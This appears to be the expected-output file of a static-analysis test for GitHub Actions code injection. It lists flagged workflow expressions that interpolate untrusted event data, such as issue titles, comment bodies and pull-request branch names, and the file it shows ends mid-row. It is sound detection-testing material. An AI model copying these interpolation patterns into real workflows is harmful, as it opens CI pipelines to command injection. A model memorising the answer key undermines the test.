| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. 
